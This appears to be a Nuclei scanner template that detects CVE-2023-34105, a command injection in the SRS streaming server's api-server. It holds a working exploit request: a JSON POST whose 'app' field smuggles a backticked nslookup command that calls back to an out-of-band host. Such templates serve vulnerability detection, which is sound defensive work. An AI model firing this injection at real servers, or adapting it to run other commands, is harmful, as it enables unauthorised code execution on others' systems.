59 lines
1.7 KiB
YAML
59 lines
1.7 KiB
YAML
id: CVE-2023-34105
|
|
|
|
info:
|
|
name: SRS - Command Injection
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: high
|
|
description: |
|
|
SRS's v5.0.137~v5.0.156, v6.0.18~v6.0.47 api-server server is vulnerable to a drive-by command injection.
|
|
reference:
|
|
- https://github.com/ossrs/srs/security/advisories/GHSA-vpr5-779c-cx62
|
|
- https://github.com/ossrs/srs/blob/1d11d02e4b82fc3f37e4b048cff483b1581482c1/trunk/research/api-server/server.go#L761
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-34105
|
|
cwe-id: CWE-77,CWE-78
|
|
epss-score: 0.01543
|
|
epss-percentile: 0.8742
|
|
cpe: cpe:2.3:a:ossrs:simple_realtime_server:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
vendor: ossrs
|
|
product: simple_realtime_server
|
|
shodan-query: http.favicon.hash:1386054408
|
|
verified: true
|
|
max-request: 1
|
|
tags: cve,cve2023,srs,rce,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/v1/snapshots HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"action": "on_publish", "app": "`nslookup {{interactsh-url}}`", "stream":"foo", "vhost": "foo", "client_id":"foo"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{"code":'
|
|
- 'data":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a0048304602210086426218b97c1124bfea5c9edb839b7072481e332faf7cef3cae4fb385bfc00b022100be07f50cee9dc39500ae2de6f3c45b63a91d2b93b095d6ed3cc43cb7678e853f:922c64590222798bb761d5b6d8e72950 |